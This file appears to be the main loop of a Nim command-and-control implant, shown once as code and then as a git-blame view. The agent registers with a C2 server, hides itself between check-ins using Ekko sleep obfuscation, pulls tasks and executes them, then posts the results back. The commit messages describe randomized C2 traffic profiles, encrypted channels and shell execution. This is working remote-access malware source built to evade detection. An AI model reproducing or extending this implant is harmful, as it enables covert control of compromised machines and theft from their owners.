src/agent/main.nim

import strformat, os, times, system, base64

import core/[http, context, sleepmask]
import protocol/[task, result, heartbeat, registration]
import ../modules/manager
import ../common/[types, utils, crypto]

proc main() = 

    # Initialize agent context
    var ctx = AgentCtx.init()
    if ctx == nil: 
        quit(0)

    # Load agent commands
    loadModules() 

    # Create registration payload
    var registration: AgentRegistrationData = ctx.collectAgentMetadata()
    let registrationBytes = ctx.serializeRegistrationData(registration)

    if not ctx.httpPost(registrationBytes): 
        echo "[-] Agent registration failed."
        quit(0)
    echo fmt"[+] [{ctx.agentId}] Agent registered."

    #[
        Agent routine: 
        1. Sleep Obfuscation
        2. Retrieve task from /tasks endpoint
        3. Execute task and post result to /results
        4. If additional tasks have been fetched, go to 2.
        5. If no more tasks need to be executed, go to 1. 
    ]#

    while true: 

        sleepEkko(ctx.sleep * 1000)

        let date: string = now().format("dd-MM-yyyy HH:mm:ss")
        echo fmt"[{date}] Checking in."

        try: 
            # Retrieve task queue for the current agent by sending a check-in/heartbeat request
            # The check-in request contains the agentId, listenerId, so the server knows which tasks to return
            var heartbeat: Heartbeat = ctx.createHeartbeat()
            let 
                heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)
                packet: string = ctx.httpGet(heartbeatBytes)

            if packet.len <= 0: 
                echo "[*] No tasks to execute."
                continue

            let tasks: seq[Task] = ctx.deserializePacket(packet)
            
            if tasks.len <= 0: 
                echo "[*] No tasks to execute."
                continue

            # Execute all retrieved tasks and return their output to the server
            for task in tasks: 
                var result: TaskResult = ctx.handleTask(task)
                let resultBytes: seq[byte] = ctx.serializeTaskResult(result)

                ctx.httpPost(resultBytes)

        except CatchableError as err: 
            echo "[-] ", err.msg
          
when isMainModule: 
    main()
Implemented ECDH key exchange using ed25519 to share a symmetric AES key without transmitting it over the network. 2025-07-24 15:31:46 +02:00			`import strformat, os, times, system, base64`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented basic sleep obfuscation via the Ekko technique using WinAPI. Improvement needed! 2025-08-27 00:27:50 +02:00			`import core/[http, context, sleepmask]`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`import protocol/[task, result, heartbeat, registration]`
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`import ../modules/manager`
			`import ../common/[types, utils, crypto]`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`proc main() =`

Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`# Initialize agent context`
			`var ctx = AgentCtx.init()`
			`if ctx == nil:`
Agent utilizes configuration file (nim.cfg) and compile-time variables for listener information. 2025-05-24 13:56:26 +02:00			`quit(0)`

Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`# Load agent commands`
			`loadModules()`

Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`# Create registration payload`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var registration: AgentRegistrationData = ctx.collectAgentMetadata()`
			`let registrationBytes = ctx.serializeRegistrationData(registration)`
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`if not ctx.httpPost(registrationBytes):`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[-] Agent registration failed."`
			`quit(0)`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`echo fmt"[+] [{ctx.agentId}] Agent registered."`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`#[`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`Agent routine:`
Added monarch agent 2025-05-19 21:56:34 +02:00			`1. Sleep Obfuscation`
			`2. Retrieve task from /tasks endpoint`
			`3. Execute task and post result to /results`
			`4. If additional tasks have been fetched, go to 2.`
			`5. If no more tasks need to be executed, go to 1.`
			`]#`
Implemented basic sleep obfuscation via the Ekko technique using WinAPI. Improvement needed! 2025-08-27 00:27:50 +02:00
Added monarch agent 2025-05-19 21:56:34 +02:00			`while true:`

Implemented Ekki according to MalDev module with both Native API and WinAPI; fixing race condition for both implementations. 2025-08-27 11:37:07 +02:00			`sleepEkko(ctx.sleep * 1000)`
Added monarch agent 2025-05-19 21:56:34 +02:00
			`let date: string = now().format("dd-MM-yyyy HH:mm:ss")`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`echo fmt"[{date}] Checking in."`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`try:`
			`# Retrieve task queue for the current agent by sending a check-in/heartbeat request`
			`# The check-in request contains the agentId, listenerId, so the server knows which tasks to return`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var heartbeat: Heartbeat = ctx.createHeartbeat()`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`let`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`heartbeatBytes: seq[byte] = ctx.serializeHeartbeat(heartbeat)`
			`packet: string = ctx.httpGet(heartbeatBytes)`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`if packet.len <= 0:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let tasks: seq[Task] = ctx.deserializePacket(packet)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`if tasks.len <= 0:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[*] No tasks to execute."`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`continue`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00			`# Execute all retrieved tasks and return their output to the server`
			`for task in tasks:`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`var result: TaskResult = ctx.handleTask(task)`
			`let resultBytes: seq[byte] = ctx.serializeTaskResult(result)`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`ctx.httpPost(resultBytes)`
Implemented sequence tracking. 2025-07-26 18:20:54 +02:00
			`except CatchableError as err:`
			`echo "[-] ", err.msg`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00
Added monarch agent 2025-05-19 21:56:34 +02:00			`when isMainModule:`
			`main()`